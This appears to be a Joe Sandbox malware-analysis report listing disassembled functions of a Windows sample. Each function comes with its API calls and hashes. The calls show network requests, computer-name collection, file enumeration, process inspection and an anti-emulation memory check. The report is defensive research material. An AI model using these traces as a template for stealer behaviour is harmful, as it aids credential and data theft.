Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 92ca6b65461faa9b9ec8dafa9f348dca968ac92895f616eeba6ec37cb7e15307
Instruction ID: 00112912651805305bd8f688625888a09da9b4cd0d13fdfca3bade320e356c29
Opcode Fuzzy Hash: 92ca6b65461faa9b9ec8dafa9f348dca968ac92895f616eeba6ec37cb7e15307
Instruction Fuzzy Hash: 22112E30A04048BBCB14FFB0DD52AED7378AF52300F504158F91A5A593EF70AB09C692

Function 000B4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000B8E0B

lstrcat.KERNEL32(?,00000000), ref: 000B4F7A
lstrcat.KERNEL32(?,000C1070), ref: 000B4F97
lstrcat.KERNEL32(?,01398A00), ref: 000B4FAB
lstrcat.KERNEL32(?,000C1074), ref: 000B4FBD

Part of subcall function 000B4910: wsprintfA.USER32 ref: 000B492C
Part of subcall function 000B4910: FindFirstFileA.KERNEL32(?,?), ref: 000B4943

Part of subcall function 000B4910: StrCmpCA.SHLWAPI(?,000C0FDC), ref: 000B4971
Part of subcall function 000B4910: StrCmpCA.SHLWAPI(?,000C0FE0), ref: 000B4987
Part of subcall function 000B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 000B4B7D
Part of subcall function 000B4910: FindClose.KERNEL32(000000FF), ref: 000B4B92

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: cbd4bf908443630143a78c3113712bab51c41a42f291ca970708f96c99b25d2f
Instruction ID: 66fe3d06b65e0cc564ebcceada67571259da015227bb70f28a9ac3666151c15b
Opcode Fuzzy Hash: cbd4bf908443630143a78c3113712bab51c41a42f291ca970708f96c99b25d2f
Instruction Fuzzy Hash: D121AD7AD40208A7D754F7B0EC8AEED337CA755300F404558B6599A192EE74ABC8CBA3

Function 000B0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01398AB0), ref: 000B079A
StrCmpCA.SHLWAPI(00000000,01398B60), ref: 000B0866
StrCmpCA.SHLWAPI(00000000,01398B70), ref: 000B099D

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 8b642ccb01ea650123d0eae5516b390e7782c37edfa600601df5c6ad61f5b965
Instruction ID: e1500e663aef2b9e30ce5201a17b51078400add519461f42ac65c74277ea2b01
Opcode Fuzzy Hash: 8b642ccb01ea650123d0eae5516b390e7782c37edfa600601df5c6ad61f5b965
Instruction Fuzzy Hash: 09914975B10248AFCB28EF64DD95BED77B5BF95300F508519E80A9F242DF30AA05CB92

Function 000B0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01398AB0), ref: 000B079A
StrCmpCA.SHLWAPI(00000000,01398B60), ref: 000B0866
StrCmpCA.SHLWAPI(00000000,01398B70), ref: 000B099D

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: f910b25381529a58c6045115091edf8619207e1daafa247a5832a4531eb1365b
Instruction ID: be506ce7b6d4f78389b40eb1552c44b79c4bb0c0e88dda367697b4dd697ad512
Opcode Fuzzy Hash: f910b25381529a58c6045115091edf8619207e1daafa247a5832a4531eb1365b
Instruction Fuzzy Hash: 31816775B10248AFCB28EF64D995AEDB7B5FF95300F508519E8099F242DF30AA05CB92

Function 000B70D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

memset.MSVCRT ref: 000B716A

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 000B718C

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 4047604823-4138519520
Opcode ID: 8b0e7d97fc94673e56cad1e85df74f8edcab548993cb733da536f55ff47178b8
Instruction ID: f93a9cf06fa24f8be9fb9e005a9fb17415081f883de560ae674f495cc89cc311
Opcode Fuzzy Hash: 8b0e7d97fc94673e56cad1e85df74f8edcab548993cb733da536f55ff47178b8
Instruction Fuzzy Hash: F85166B0D04218AFDB64EB94DC55BEEB3B4AF44304F1045A8E51977182EF746E88CF65

Function 000B78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B7910
RtlAllocateHeap.NTDLL(00000000), ref: 000B7917
GetComputerNameA.KERNEL32(?,00000104), ref: 000B792F

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 5a22e9687378620b51ab1129c1eda77a9ed9504cad8a83e876cc78b97b7d2916
Instruction ID: 91da40c0b9942abfc9193c77c9fb510748472f37cd77b9bcd36bb0074b03b2ea
Opcode Fuzzy Hash: 5a22e9687378620b51ab1129c1eda77a9ed9504cad8a83e876cc78b97b7d2916
Instruction Fuzzy Hash: 8B0186B1944244EBC710DF94DD49FAEBBB8F744B11F10421AF645E7280D77459008BA2

Function 6C653060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C653095

Part of subcall function 6C6535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
Part of subcall function 6C6535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
Part of subcall function 6C6535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
Part of subcall function 6C6535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
Part of subcall function 6C6535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
Part of subcall function 6C6535A0: __aulldiv.LIBCMT ref: 6C6536E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C65309F

Part of subcall function 6C675B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6756EE,?,00000001), ref: 6C675B85
Part of subcall function 6C675B50: EnterCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675B90
Part of subcall function 6C675B50: LeaveCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675BD8
Part of subcall function 6C675B50: GetTickCount64.KERNEL32 ref: 6C675BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6530BE

Part of subcall function 6C6530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C653127
Part of subcall function 6C6530F0: __aulldiv.LIBCMT ref: 6C653140

Part of subcall function 6C68AB2A: __onexit.LIBCMT ref: 6C68AB30

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction ID: 7e821f3c6f95d7c1e9a327f8a3053eed9933defdbf171d57371cc51e0863054d
Opcode Fuzzy Hash: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction Fuzzy Hash: 48F0D612D2078896CB10DF7588911A6B370AF6F114F545729F84463A61FB2071E883DE

Function 000B9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 000B9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 000B94A5
CloseHandle.KERNEL32(00000000), ref: 000B94AF

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 5cd78a85d3e02f316ed5e1709f5c7b02c0f711052b9ca15558e3f3f8e7d1f9e9
Instruction ID: e03a51fa0bb9f66154bada3bcee93d94442d392ea1c3286852b123c7c2de3ef7
Opcode Fuzzy Hash: 5cd78a85d3e02f316ed5e1709f5c7b02c0f711052b9ca15558e3f3f8e7d1f9e9
Instruction Fuzzy Hash: 2CF0307494020CBBDB04DF94DC8AFED7774EB08300F004454BA095B290D6B06A85CB91

Function 000A1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000A112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 000A1132
ExitProcess.KERNEL32 ref: 000A1143

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
